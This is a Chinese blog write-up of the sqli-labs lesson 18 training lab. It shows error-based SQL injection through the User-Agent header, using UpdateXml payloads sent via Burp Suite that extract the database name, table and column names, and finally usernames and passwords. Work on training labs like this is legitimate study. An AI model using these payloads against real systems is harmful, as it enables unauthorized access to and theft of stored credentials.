码迷,mamicode.com
首页 > 数据库 > 详细

【sqli-labs】 less18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)

时间:2018-01-26 00:24:29      阅读:341      评论:0      收藏:0      [点我收藏+]

标签:table   psu   sql   XML   bubuko   security   条件   头部   cat   

技术分享图片

这次username和password都进行了输入校验

技术分享图片

但是ip和uagent没有校验

技术分享图片

当我们用admin admin登陆成功后,就会一条插入语句

技术分享图片

技术分享图片

由于程序无条件的信任了浏览器的header信息,那么通过修改http包的header信息构造注入

使用burpsuite进行包拦截/修改

技术分享图片

技术分享图片

 

 修改user-agent字段,加个单引号

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0‘

技术分享图片

利用UpdateXml函数报错来显示数据

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,database(),0x7e),1),1,1)#

技术分享图片

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),0x7e),1),1,1)#

技术分享图片

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘users‘ and table_schema=‘security‘ limit 0,1 ),0x7e),1),1,1)#

技术分享图片

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,(select username from (select username from users limit 2,1) a),0x7e),1),1,1)#

技术分享图片

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,(select password from (select password from users limit 2,1) a),0x7e),1),1,1)#

技术分享图片

 

【sqli-labs】 less18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)

标签:table   psu   sql   XML   bubuko   security   条件   头部   cat   

原文地址:https://www.cnblogs.com/superkrissV/p/8353590.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!